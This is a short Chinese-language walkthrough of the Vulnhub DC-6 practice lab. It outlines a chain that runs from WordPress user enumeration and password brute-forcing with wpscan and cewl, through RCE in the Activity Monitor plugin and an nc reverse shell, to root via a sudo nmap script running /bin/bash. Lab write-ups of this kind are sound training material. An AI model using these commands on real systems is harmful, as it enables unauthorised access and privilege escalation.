Vulnhub——DC-6渗透
一、涉及漏洞类型:
暴力破解
RCE
CMS插件漏洞
二、渗透思路:
主机发现 => 端口扫描 => 访问web服务 => 暴破登录 => 利用已知漏洞RCE => nc反弹shell => 切换用户 => nmap提权 => 找到最终flag
三、学到知识点:
1.dirb
dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站
dirb http://wordy/
对站点进行目录扫描
2.wpscan
这是一款Wordpress的专用扫描器
wpscan --url http://wordy/ -e u
wpscan --url wordy -U wordy-users.dic -P wordy-pass1.dic
爆破网站用户名
对用户名和密码进行爆破
3.cewl
cewl是一个 ruby 应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解
cewl wordy -w wordy-pass.dic
生成密码字典wordy-pass.dic
4.插件Activity monitor
WordPress的一个存在远程命令执行的插件
5.
echo "os.execute('/bin/bash')" >> root1
sudo nmap --script=root1
将os.execute('/bin/bash')命令写入到root1文件中
执行nmap命令进行提权

四、参考:
https://blog.csdn.net/weixin_52497013/article/details/122182340
https://www.freesion.com/article/1437605354/
https://blog.csdn.net/qq_45722813/article/details/121758837?spm=1001.2014.3001.5501

浙公网安备 33010602011771号